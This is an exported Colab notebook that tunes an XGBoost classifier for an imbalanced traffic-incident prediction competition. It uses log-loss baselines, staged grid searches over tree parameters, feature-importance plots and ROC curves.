X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
# + [markdown] id="d1Zas0haZolq" colab_type="text"
# #### Instead of ```numpy``` arrays or ```pandas``` DataFrames, ```XGBoost``` uses ```DMatrices```.
#
#
# + colab_type="code" id="nq1SGFcYeFlV" colab={}
dtrain = xgb.DMatrix(X_train, label=y_train)
dtest = xgb.DMatrix(X_test, label=y_test)
# + [markdown] id="p-Y6io42Z0er" colab_type="text"
# #### We've already seen how imbalanced the data is. Let's have another look.
# + id="3XY72D26u4rb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 54} outputId="0a2065f2-eb04-4649-c43d-a49a22c4c2e4"
# summarize dataset
classes = np.unique(y)
total = len(y)
for c in classes:
n_examples = len(y[y==c])
percent = n_examples / total * 100
print('> Class=%d : %d/%d (%.1f%%)' % (c, n_examples, total, percent))
# + [markdown] id="XDf-Z5c2aEoR" colab_type="text"
# #### Now ```logloss```.
#
# > From 01_SimpleXGB.ipynb we've seen that ```accuracy``` does us no good. It's always going to be around ```99%``` because of the class imbalance. ```auc``` also proved extremely optimistic when compared to an ```f1_score``` (the competition requirement).
#
# > We need another ```metric```. Following [johnowhitaker's](https://datasciencecastnet.home.blog/2019/10/19/zindi-uberct-part-1-getting-started/) lead; a crisp class label is not required; instead a probability of class membership is preferred. "*The probability summarizes the likelihood (or uncertainty) of an example belonging to each class label... [and is]... specifically designed to quantify the skill of a classifier model using the predicted probabilities instead of crisp class labels.*"
#
# > Probability metrics will summarize how well the predicted distribution of class membership matches the known class probability distribution.
#
# > This is what we need. Thanks to [machinelearningmastery](https://machinelearningmastery.com/probability-metrics-for-imbalanced-classification/)
#
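# To make the baseline below concrete, here is a small hand computation of what ```log_loss``` returns: the mean negative log-probability assigned to the true class (toy labels and probabilities, not the competition data):

```python
import numpy as np
from sklearn.metrics import log_loss

# Toy binary labels and predicted P(class=1) - illustrative values only
y_true = np.array([0, 0, 1, 0])
y_prob = np.array([0.1, 0.2, 0.8, 0.3])

# Log loss is the mean negative log-likelihood of the true class
manual = -np.mean(y_true * np.log(y_prob) + (1 - y_true) * np.log(1 - y_prob))

# Matches sklearn's implementation (probabilities here are strictly
# inside (0, 1), so sklearn's clipping has no effect)
assert np.isclose(manual, log_loss(y_true, y_prob))
```

# Confident wrong predictions (high probability on the wrong class) are punished hardest, which is exactly the behaviour we want on an imbalanced problem.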
# + [markdown] id="UqLnK-jghGl8" colab_type="text"
# #### We can predict certain probabilities for class 0...
# + colab_type="code" id="OJb1vly1_WnS" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="99adf3c5-6ff5-4cab-c16b-862a565d40b5"
# no skill prediction 0
probabilities = [[1, 0] for _ in range(len(y_test))]
avg_logloss = log_loss(y_test, probabilities)
print('P(class0=1): Log Loss=%.3f' % (avg_logloss))
# + [markdown] id="FCszZ-L6hPdG" colab_type="text"
# #### ...or class 1.
#
# + id="PhoWuiq7bu47" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="aad489fd-5212-478e-d8c6-0989cd23a738"
# no skill prediction 1
probabilities = [[0, 1] for _ in range(len(y_test))]
avg_logloss = log_loss(y_test, probabilities)
print('P(class1=1): Log Loss=%.3f' % (avg_logloss))
# + [markdown] id="XNADzrSlhcof" colab_type="text"
# #### A better strategy would be to predict the class distribution.
# + id="QeRisMkXbTgV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="1fa5c47e-a58b-48ae-e052-0e75487ec193"
# baseline probabilities
probabilities = [[0.997, 0.003] for _ in range(len(y_test))]
avg_logloss = log_loss(y_test, probabilities)
print('Baseline: Log Loss=%.3f' % (avg_logloss))
# + [markdown] id="w4exv7THiJSj" colab_type="text"
# #### How do we know this is reliable?
# + id="uiNZO0FnkiU4" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="4cc55737-c038-4336-92b2-c88614036312"
# perfect probabilities
avg_logloss = log_loss(y_test, y_test)
print('Perfect: Log Loss=%.3f' % (avg_logloss))
# + [markdown] colab_type="text" id="dc0-Kv95RtWJ"
# #### We have a baseline; now some basic ```parameter``` tuning.
#
# > First we do a rough search for the optimal ```n_estimators``` (number of trees) given a range of ```learning_rate``` values. We'll refine it later, but it's a good starting point.
#
# > #### Note: I've left the ```scale_pos_weight = 18.291```; as discussed in 01_SimpleXGBoost.ipynb. I've also changed the ```max_delta_step``` to a positive value (=1) as it can help with extremely imbalanced data; based on: [here](http://ethen8181.github.io/machine-learning/trees/xgboost.html#XGBoost-Basics) and [here](https://stats.stackexchange.com/questions/387632/running-xgboost-with-highly-imbalanced-data-returns-near-0-true-positive-rate).
#
#
#
#
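# For context, ```scale_pos_weight``` is commonly set to the ratio of negative to positive examples, which is presumably where the ```18.291``` above comes from. A sketch on toy labels (the counts are illustrative, not the actual dataset):

```python
import numpy as np

# Toy imbalanced labels - counts are illustrative only
y = np.array([0] * 947 + [1] * 53)

# Common heuristic: scale_pos_weight = n_negative / n_positive,
# so errors on the rare positive class weigh that much more
scale_pos_weight = (y == 0).sum() / (y == 1).sum()
```
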
# + id="Qk5WdSJOXCv6" colab_type="code" colab={}
# define a model
xgb_rough = XGBClassifier(
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=18.291,
seed=27)
# + id="CRTnox2yb4AF" colab_type="code" colab={}
# kfold gridsearchcv
# which n_estimators do you want to search?
n_estimators = [100, 200, 300, 400, 500]
# which learning_rate do you want to search?
learning_rate = [0.1, 0.2, 0.3]
param_grid = dict(learning_rate=learning_rate, n_estimators=n_estimators)
kfold = StratifiedKFold(n_splits=2, shuffle=True)
grid_search = GridSearchCV(xgb_rough, param_grid, scoring="neg_log_loss", n_jobs=1, cv=kfold, verbose=2)
# + id="uMJUvLDdd6pF" colab_type="code" colab={}
#define evaluation metrics
eval_set = [(X_train, y_train), (X_test, y_test)]
eval_metric = ["logloss", 'error']
# + id="ay5JQDXTdzol" colab_type="code" colab={}
# %%time
grid_result = grid_search.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="go5XtlyViUYX" colab_type="code" colab={}
# save model to file
pickle.dump(xgb_rough, open(path/'xgb_rough.pickle.dat', 'wb'))
# + id="kyNbOwPncFbT" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 315} outputId="bbd70275-66b0-4cd3-8b3f-845162c6f99f"
# summarize results
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="2PODyyVhcN-L" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 498} outputId="7b468316-0f60-49a6-a626-1d1cc8da1d93"
# plot results
fig, ax = plt.subplots(figsize=(8,8))
scores = np.array(means).reshape(len(learning_rate), len(n_estimators))
for i, value in enumerate(learning_rate):
plt.plot(n_estimators, scores[i], label='learning_rate: ' + str(value))
plt.legend()
plt.xlabel('n_estimators')
plt.ylabel('Log Loss')
plt.show()
# + [markdown] id="fLhPDfxoeAQK" colab_type="text"
# #### Due to memory limitations I'm choosing a ```learning_rate``` of ```0.3```. A lower ```learning_rate``` (```0.1```/```0.2```) will require too many trees, more RAM and more time.
#
# > Let's find the proper ```n_estimators```. We run ```xgb.cv``` with ```early_stopping_rounds=10```.
#
#
#
#
#
#
# + id="9mw69Z0jdF3W" colab_type="code" colab={}
xgb_smooth = XGBClassifier(
learning_rate=0.3,
n_estimators=1000,
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=18.291,
seed=27)
#collect parameters
xgb_param = xgb_smooth.get_xgb_params()
# + id="CG3gWv4OW3ok" colab_type="code" colab={}
# %%time
cvresult = xgb.cv(xgb_param, dtrain, num_boost_round=xgb_smooth.get_params()['n_estimators'],
nfold=3,
metrics='logloss', early_stopping_rounds=10, verbose_eval=True)
# + id="23dmhVrJXIA8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="e0f6dbde-39bd-4a0b-ee25-75d1f359322c"
print('Best n_estimators =', cvresult.shape[0])
# + id="e0KLpN-ixXfW" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 147} outputId="9146521b-86eb-40ee-d17a-b7aaf439d0fe"
# add the optimal n_estimators to the parameters
xgb_smooth.set_params(n_estimators=cvresult.shape[0])
# + id="yKQEKRhXxgl9" colab_type="code" colab={}
#Fit the algorithm on the data
# %time xgb_smooth.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="c3SKyKlUe2s6" colab_type="code" colab={}
# save model to file
pickle.dump(xgb_smooth, open(path/'xgb_smooth.dat', 'wb'))
# some time later...
# load model from file
#loaded_model = pickle.load(open(path/'sanral_with_weather.pickle.dat', 'rb'))
# + id="rom_akWBn3go" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="d178fa97-ca36-4569-9670-b2d01fc13de0"
plot_importance(xgb_smooth, max_num_features = 14)
plt.show()
# + id="q0vTlDF16k6z" colab_type="code" colab={}
#Predict training set:
dtrain_predictions = xgb_smooth.predict(X_train)
train_pred = [round(value) for value in dtrain_predictions]
dtrain_predprob = xgb_smooth.predict_proba(X_train)[:,1]
#Predict test set:
dtest_predictions = xgb_smooth.predict(X_test)
test_pred = [round(value) for value in dtest_predictions]
dtest_predprob = xgb_smooth.predict_proba(X_test)[:,1]
# + colab_type="code" id="HTnGUHn1XS53" colab={"base_uri": "https://localhost:8080/", "height": 222} outputId="2619de10-56bd-495f-ff81-a68a9e0e0219"
#Print model report:
print("\nModel Report")
print("Training Accuracy : %.4g" % accuracy_score(y_train.values, train_pred))
#print("Training Accuracy : %.4g" % accuracy_score(y_train.values, dtrain_predictions))
print("AUC Score (Train): %f" % roc_auc_score(y_train, dtrain_predprob))
print("logloss (Train): %f" % log_loss(y_train, dtrain_predprob))
print("Preliminary f1-score (Train): %f" %f1_score(y_train, dtrain_predictions))
print('')
print("Test Accuracy : %.4g" % accuracy_score(y_test.values, test_pred))
#print("Test Accuracy : %.4g" % accuracy_score(y_test.values, dtest_predictions))
print("AUC Score (Test): %f" % roc_auc_score(y_test, dtest_predprob))
print("logloss (Test): %f" % log_loss(y_test, dtest_predprob))
print("Preliminary f1-score (Test): %f" %f1_score(y_test, dtest_predictions))
# + [markdown] id="JvQlpxTfmZu6" colab_type="text"
# #### ```logarithmic loss``` of the XGBoost model for each epoch on the training and test datasets.
#
#
# + id="So4L4rCOa2V1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 444} outputId="f7a806fd-1abc-4fa1-cdcf-b1a6967d0d77"
# retrieve performance metrics
results = xgb_smooth.evals_result()
epochs = len(results['validation_0']['error'])
x_axis = range(0, epochs)
# plot log loss
fig, ax = plt.subplots(figsize=(7,7))
ax.plot(x_axis, results['validation_0']['logloss'], linestyle = '-', label='Train')
ax.plot(x_axis, results['validation_1']['logloss'], linestyle = '--', label='Test')
ax.legend()
plt.ylabel('Log Loss')
plt.title('XGBoost Log Loss')
plt.show()
# + [markdown] id="nW0b_jZGjLC0" colab_type="text"
# #### Good. Let's move along to ```max_depth``` (*the maximum depth of each tree; limiting it simplifies your model and helps avoid overfitting*) and ```min_child_weight```.
#
# > Again we firstly do a rough search along a ```range``` of values; then iteratively refine.
#
#
# + id="mCFqAfATjImK" colab_type="code" colab={}
param_test1 = {
'max_depth':range(3,11,3),
'min_child_weight':range(1,9,3)
}
gsearch1 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=5, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test1, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="yRezZ03Kj-PJ" colab_type="code" colab={}
# %%time
gsearch1.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="MtRs49zklTKe" colab_type="code" colab={}
# save model to file
#pickle.dump(gsearch1, open(path/'gsearch1.pickle.dat', 'wb'))
# load model from file
gsearch1 = pickle.load(open(path/'gsearch1.pickle.dat', "rb"))
# + id="8fR_KNFawHn2" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 203} outputId="3e4e4379-193e-42e7-b1b9-d256b2c6de3a"
# summarize results
print("Best: %f using %s" % (gsearch1.best_score_, gsearch1.best_params_))
means = gsearch1.cv_results_['mean_test_score']
stds = gsearch1.cv_results_['std_test_score']
params = gsearch1.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + [markdown] id="nrb2CQYYyHCC" colab_type="text"
# #### A graph is always useful
# + id="WTrlK_YJs4D2" colab_type="code" colab={}
def plot_grid_search(cv_results, grid_param_1, grid_param_2, name_param_1, name_param_2):
'''
Define a function to plot search parameters vs cv_results
'''
# Get Test Scores Mean and std for each grid search
scores_mean = cv_results['mean_test_score']
scores_mean = np.array(scores_mean).reshape(len(grid_param_2),len(grid_param_1))
scores_sd = cv_results['std_test_score']
scores_sd = np.array(scores_sd).reshape(len(grid_param_2),len(grid_param_1))
# Plot Grid search scores
_, ax = plt.subplots(1,1)
# Param1 is the X-axis, Param 2 is represented as a different curve (color line)
for idx, val in enumerate(grid_param_2):
ax.plot(grid_param_1, scores_mean[idx,:], '-o', label= name_param_2 + ': ' + str(val))
ax.set_title("Grid Search Scores", fontsize=20, fontweight='bold')
ax.set_xlabel(name_param_1, fontsize=16)
ax.set_ylabel('CV Average Score', fontsize=16)
ax.legend(fontsize=15, bbox_to_anchor=(1.04,0.5), loc="center left")
ax.grid('on')
# + id="as1gXMTus8A7" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 307} outputId="008413ad-f5e6-4656-87fc-83757118152b"
# Calling Method
plot_grid_search(gsearch1.cv_results_, param_test1['max_depth'],
param_test1['min_child_weight'], 'max_depth', 'min_child_weight')
# + [markdown] id="ilHpcxf6qzY3" colab_type="text"
# #### We ```fit 2 folds for each of 9 candidates, totalling 18 fits``` with an interval of ```3```. The ideal values are ```9``` for ```max_depth``` and ```1``` for ```min_child_weight```. Now we search with a different range. The idea here is to iteratively narrow the search space.
#
# > A ```GridSearch``` through the entire parameter range ```[1, 10]```, with a ```step``` of ```1```, takes too long (*+12-hours*). I prefer this method.
#
#
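# The coarse-to-fine idea can be sketched with a toy model: scan a wide grid with a large step, then re-search a narrow window around the best value. A ```DecisionTreeClassifier``` on synthetic data stands in for the real ```XGBClassifier``` run, which is far slower:

```python
from sklearn.datasets import make_classification
from sklearn.model_selection import GridSearchCV
from sklearn.tree import DecisionTreeClassifier

X, y = make_classification(n_samples=200, n_features=10, random_state=0)

# Pass 1: coarse scan with a step of 3
coarse = GridSearchCV(DecisionTreeClassifier(random_state=0),
                      {'max_depth': list(range(2, 11, 3))}, cv=3).fit(X, y)
best = coarse.best_params_['max_depth']

# Pass 2: fine scan with a step of 1 around the coarse optimum
fine = GridSearchCV(DecisionTreeClassifier(random_state=0),
                    {'max_depth': list(range(max(2, best - 2), best + 3))},
                    cv=3).fit(X, y)
```

# Each pass fits far fewer candidates than one exhaustive grid, at the cost of possibly missing an optimum that sits between coarse grid points.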
# + id="HfACL6U1h8so" colab_type="code" colab={}
param_test2 = {
'max_depth':range(2,11,3),
'min_child_weight':range(2,11,3)
}
gsearch2 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=5, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test2, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="_glMf_dyiHf5" colab_type="code" colab={}
# %%time
gsearch2.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="yK50VPX10_dA" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch2, open(path/'gsearch2.pickle.dat', 'wb'))
# + id="cpbD5-evv23X" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 203} outputId="3b99f19c-2b46-4a2d-fd41-1f433183415c"
# summarize results
print("Best: %f using %s" % (gsearch2.best_score_, gsearch2.best_params_))
means = gsearch2.cv_results_['mean_test_score']
stds = gsearch2.cv_results_['std_test_score']
params = gsearch2.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="30n_aGS20_w-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 307} outputId="ff7bf369-593e-4841-c502-c613b3d681a8"
# call the plot
plot_grid_search(gsearch2.cv_results_, param_test2['max_depth'],
param_test2['min_child_weight'], 'max_depth', 'min_child_weight')
# + [markdown] id="JufeCVckuldM" colab_type="text"
# #### From ```2 folds for each of 9 candidates, totalling 18 fits``` with an interval of ```3```, we see the ideal values are ```8``` for ```max_depth``` and ```2``` for ```min_child_weight```.
#
# #### Now we search between this result; and the previous.
#
#
# + id="VLhsHBf_0_uU" colab_type="code" colab={}
param_test3 = {
'max_depth':[8,9],
'min_child_weight':[1,2]
}
gsearch3 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=5, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test3, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="SvWgmcfM0_tJ" colab_type="code" colab={}
# %%time
gsearch3.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="KYUO3ryG0_lw" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch3, open(path/'gsearch3.pickle.dat', 'wb'))
# + id="tWCAZ_W_wp_4" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 110} outputId="f5570377-3a80-4882-deae-cd431b5874c4"
# summarize results
print("Best: %f using %s" % (gsearch3.best_score_, gsearch3.best_params_))
means = gsearch3.cv_results_['mean_test_score']
stds = gsearch3.cv_results_['std_test_score']
params = gsearch3.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="GtJzjSHL0_hP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 307} outputId="b1fe5210-8eaa-478f-9e5c-6f3fb66d1a22"
# call the plot
plot_grid_search(gsearch3.cv_results_, param_test3['max_depth'],
param_test3['min_child_weight'], 'max_depth', 'min_child_weight')
# + [markdown] id="RSDA48VFVKtE" colab_type="text"
# #### We have ```max_depth```: 9 and ```min_child_weight```: 1.
#
# #### Now let's tune ```gamma``` using the parameters above. ```gamma``` can take various values, but we'll check just 2 values, as more values require more ```tuning``` time.
# + id="XjEAbrcqVo0b" colab_type="code" colab={}
param_test4 = {
'gamma':[i/10.0 for i in range(0,2)]
}
gsearch4 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=339, max_depth=9, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test4, scoring='neg_log_loss',n_jobs=1, cv=3, verbose=2)
# + id="R1hvADuR4aHV" colab_type="code" colab={}
# %%time
gsearch4.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="TyYhWxrYVp2n" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch4, open(path/'gsearch4.pickle.dat', 'wb'))
# + id="mFBhd4CkwwqK" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 73} outputId="94ecfb22-a35a-47d8-9aad-c5fb584cb1e3"
# summarize results
print("Best: %f using %s" % (gsearch4.best_score_, gsearch4.best_params_))
means = gsearch4.cv_results_['mean_test_score']
stds = gsearch4.cv_results_['std_test_score']
params = gsearch4.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + [markdown] id="Nomlm220WWmd" colab_type="text"
# #### Before proceeding, a good idea would be to re-calibrate ```n_estimators``` for the updated parameters.
# + id="EQJIbIEfVqEh" colab_type="code" colab={}
#re-calibrate n_estimators
xgb_smooth = XGBClassifier(
learning_rate=0.3,
n_estimators=1000,
max_depth=9,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=18.291,
seed=27)
#collect parameters
xgb_param = xgb_smooth.get_xgb_params()
# + id="zQG44oMBkS3g" colab_type="code" colab={}
# %%time
cvresult = xgb.cv(xgb_param, dtrain, num_boost_round=xgb_smooth.get_params()['n_estimators'],
nfold=3,
metrics='logloss', early_stopping_rounds=10, verbose_eval=True)
# + id="Hq5aM-LEkS63" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="029dd033-ec3b-4202-d2c6-af9a595a12a6"
print('Best n_estimators =', cvresult.shape[0])
# + id="KgTApNLW6-Xe" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 147} outputId="47265133-3135-47b1-86c4-4a1a822152a5"
# add the optimal n_estimators to the parameters
xgb_smooth.set_params(n_estimators=cvresult.shape[0])
# + id="Jkr5JC8BkTAC" colab_type="code" colab={}
#Fit the algorithm on the data
# %time xgb_smooth.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="x6hUs6D1kTEo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="94fc09b7-d068-42c2-f3bb-aa96370da1d5"
plot_importance(xgb_smooth, max_num_features = 14)
plt.show()
# + id="yOFCuWNRkTJT" colab_type="code" colab={}
#Predict training set:
dtrain_predictions = xgb_smooth.predict(X_train)
train_pred = [round(value) for value in dtrain_predictions]
#only the positive class
dtrain_predprob = xgb_smooth.predict_proba(X_train)[:,1]
#Predict test set:
dtest_predictions = xgb_smooth.predict(X_test)
test_pred = [round(value) for value in dtest_predictions]
#only the positive class
dtest_predprob = xgb_smooth.predict_proba(X_test)[:,1]
# + id="wF4pMdrl_ZWu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 222} outputId="f9a77ace-5557-45fd-d9b9-422f7f67295f"
#Print model report:
print("\nModel Report")
print("Training Accuracy : %.4g" % accuracy_score(y_train.values, train_pred))
#print("Training Accuracy : %.4g" % accuracy_score(y_train.values, dtrain_predictions))
print("AUC Score (Train): %f" % roc_auc_score(y_train, dtrain_predprob))
print("logloss (Train): %f" % log_loss(y_train, dtrain_predprob))
print("Preliminary f1-score (Train): %f" %f1_score(y_train, dtrain_predictions))
print('')
print("Test Accuracy : %.4g" % accuracy_score(y_test.values, test_pred))
#print("Test Accuracy : %.4g" % accuracy_score(y_test.values, dtest_predictions))
print("AUC Score (Test): %f" % roc_auc_score(y_test, dtest_predprob))
print("logloss (Test): %f" % log_loss(y_test, dtest_predprob))
print("Preliminary f1-score (Test): %f" %f1_score(y_test, dtest_predictions))
# + [markdown] id="Som0zWbCJTpT" colab_type="text"
# ## NB: I stopped ```parameter tuning``` here and proceeded to ```Plot ROC curves```...
#
# #### The rest of the ```code``` between here and there (and most of the above, adapted from [Analytics Vidhya](https://www.analyticsvidhya.com/blog/2016/03/complete-guide-parameter-tuning-xgboost-with-codes-python/)) completes the ```tuning```, which I might do at another time.
#
# + [markdown] id="ETtoHllXGBvX" colab_type="text"
# #### The next step would be to try different ```subsample``` and ```colsample_bytree``` values.
#
# > We search values from 0.8 to 1 for ```subsample``` and 0.5 through 1 for ```colsample_bytree```: although we have not ```one-hot-encoded```, we do have 14 columns, and will add more.
#
#
# + id="2BFh1TbJGTbc" colab_type="code" colab={}
param_test5 = {
'subsample':[i/10.0 for i in range(8,11)],
'colsample_bytree':[i/10.0 for i in range(5,11)]
}
gsearch5 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=353, max_depth=9, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test5, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="VYUjUgb1GTXm" colab_type="code" colab={}
# %%time
gsearch5.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="EYXikxx0GTTu" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch5, open(path/'gsearch5.pickle.dat', 'wb'))
# + id="XOwch04bw5qu" colab_type="code" colab={}
# summarize results
print("Best: %f using %s" % (gsearch5.best_score_, gsearch5.best_params_))
means = gsearch5.cv_results_['mean_test_score']
stds = gsearch5.cv_results_['std_test_score']
params = gsearch5.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="NF9qdpKOGTQI" colab_type="code" colab={}
gsearch5.cv_results_, gsearch5.best_params_, gsearch5.best_score_
# + id="PL-rs88EQCOX" colab_type="code" colab={}
param_test6 = {
'colsample_bytree':[i/10.0 for i in range(5,11)]
}
gsearch6 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=353, max_depth=5, max_delta_step=1,
min_child_weight=6, gamma=0.1, subsample=1.0, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291,seed=27),
param_grid = param_test6, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="vJvvy9pERhHQ" colab_type="code" colab={}
# %%time
gsearch6.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="miop3yJgRmFM" colab_type="code" colab={}
gsearch6.cv_results_, gsearch6.best_params_, gsearch6.best_score_
# + [markdown] id="u8HW37GzGWKV" colab_type="text"
# #### Our last step is to apply regularization, which can reduce overfitting. Though ```gamma``` is more popular and provides a substantial way of controlling complexity, we should also try ```reg_alpha```.
# + id="cbZbTHsakTIQ" colab_type="code" colab={}
param_test7 = {
'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]
}
gsearch7 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=353, max_depth=5, max_delta_step=1,
min_child_weight=6, gamma=0.1, subsample=1.0, colsample_bytree=1.0,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test7, scoring='neg_log_loss', n_jobs=1, cv=2, verbose=2)
# + id="cS1VT5TnkTDD" colab_type="code" colab={}
# %%time
gsearch7.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="4hXHoBXMxDss" colab_type="code" colab={}
# summarize results
print("Best: %f using %s" % (gsearch7.best_score_, gsearch7.best_params_))
means = gsearch7.cv_results_['mean_test_score']
stds = gsearch7.cv_results_['std_test_score']
params = gsearch7.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="Ec0-F5za66KA" colab_type="code" colab={}
gsearch7.cv_results_, gsearch7.best_params_, gsearch7.best_score_
# + [markdown] id="97Um8HwBaqrG" colab_type="text"
# #### Now let's calculate a threshold and make a prediction.
# + id="G3zaTAnW66eE" colab_type="code" colab={}
#change these to what they should be
model = XGBClassifier(
learning_rate=0.2,
n_estimators=353,
max_depth=5,
min_child_weight=6,
gamma=0.1,
subsample=1.0,
colsample_bytree=1.0,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=1,
reg_alpha=0,
seed=27)
# + id="6pkeV9VU66p4" colab_type="code" colab={}
model.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=2)
# + [markdown] id="wWbDIFUoSvFR" colab_type="text"
# #### Most important features
# + id="GgAFVAvs66vF" colab_type="code" colab={}
plot_importance(model, max_num_features = 14)
plt.show()
# + id="Loy_Ttkp66m-" colab_type="code" colab={}
#lets predict *PROBABILITIES* on the training-set
y_pred_train = xgb_smooth.predict_proba(X_train)
# keep probabilities for the positive outcome only
y_pred_train = y_pred_train[:, 1]
# calculate roc curves
fpr, tpr, thresholds = roc_curve(y_train, y_pred_train)
#lets predict *PROBABILITIES* on the test-set
y_pred_test = xgb_smooth.predict_proba(X_test)
# keep probabilities for the positive outcome only
y_pred_test = y_pred_test[:, 1]
# calculate roc curves
fpr_t, tpr_t, thresholds_t = roc_curve(y_test, y_pred_test)
# + id="TrCi9GSK66k7" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 73} outputId="5dd41ff9-83a3-4891-b364-ddbfb6fd0cbf"
print('Training log_loss:', log_loss(y_train, y_pred_train))
print('')
print('Test log_loss:', log_loss(y_test, y_pred_test))
# + [markdown] id="S2IXQT0JS4X5" colab_type="text"
# #### Plot ROC curves for both the ```training``` and ```test``` datasets
#
# + id="zRkR9BeT66jl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="56deb549-4ca0-449d-c573-37e040b3c607"
#plot
fig,ax = plt.subplots()
plt.plot([0,1],[0,1],'-',label='Random Guess',color='orange')#,lw=3)
plt.plot(fpr,tpr,label='ROC (Train)')#,lw=3)
plt.plot(fpr_t,tpr_t,':',label='ROC (Test)',color='steelblue')#,lw=3)
#pyplot.scatter(fpr[ix], tpr[ix], marker='o', color='black', label='Best Train')
#pyplot.scatter(fpr_test[ix_t], tpr_test[ix_t], marker='o', color='red', label='Best Test')
plt.grid()
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.legend()
plt.show()
